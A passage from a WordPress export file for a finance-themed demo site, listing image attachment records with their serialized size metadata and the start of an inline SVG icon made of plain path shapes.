		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:23:"2020/09/flip-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"flip-box3-1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"flip-box3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box3-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"flip-box3-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/bg1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:17:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>540</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:17:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:17:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:408;s:4:"file";s:23:"2020/09/bg1-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:22:"bg1-value-1-300x64.jpg";s:5:"width";i:300;s:6:"height";i:64;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"bg1-value-1-1024x218.jpg";s:5:"width";i:1024;s:6:"height";i:218;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"bg1-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"bg1-value-1-768x163.jpg";s:5:"width";i:768;s:6:"height";i:163;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"bg1-value-1-1536x326.jpg";s:5:"width";i:1536;s:6:"height";i:326;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"bg1-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"bg1-value-1-600x408.jpg";s:5:"width";i:600;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"bg1-value-1-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"bg1-value-1-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/image1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:33:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>542</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:33:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:33:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:26:"2020/09/image1-value.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"image1-value-1-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"image1-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"image1-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"image1-value-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"image1-value-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/bg2-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:26:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>549</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:26:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:26:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:686;s:4:"file";s:23:"2020/09/bg2-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"bg2-value-1-300x107.jpg";s:5:"width";i:300;s:6:"height";i:107;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"bg2-value-1-1024x366.jpg";s:5:"width";i:1024;s:6:"height";i:366;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"bg2-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"bg2-value-1-768x274.jpg";s:5:"width";i:768;s:6:"height";i:274;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"bg2-value-1-1536x549.jpg";s:5:"width";i:1536;s:6:"height";i:549;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"bg2-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"bg2-value-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"bg2-value-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"bg2-value-1-1200x686.jpg";s:5:"width";i:1200;s:6:"height";i:686;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/bg3-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:53:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>558</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:53:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:53:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg3-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:23:"2020/09/bg3-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"bg3-value-1-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"bg3-value-1-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"bg3-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"bg3-value-1-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"bg3-value-1-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"bg3-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"bg3-value-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"bg3-value-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"bg3-value-1-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/pheader-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>567</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:25:"2020/09/pheader-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:24:"pheader-faq-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"pheader-faq-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"pheader-faq-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"pheader-faq-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"pheader-faq-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-faq-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-faq-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"pheader-faq-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"pheader-faq-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/bg1-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:41:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>571</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:41:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:41:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:250;s:4:"file";s:21:"2020/09/bg1-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg1-faq-1-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-faq-1-1024x133.jpg";s:5:"width";i:1024;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-faq-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-faq-1-768x100.jpg";s:5:"width";i:768;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-faq-1-1536x200.jpg";s:5:"width";i:1536;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-faq-1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-faq-1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-faq-1-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-faq-1-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/01-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>583</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/01-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
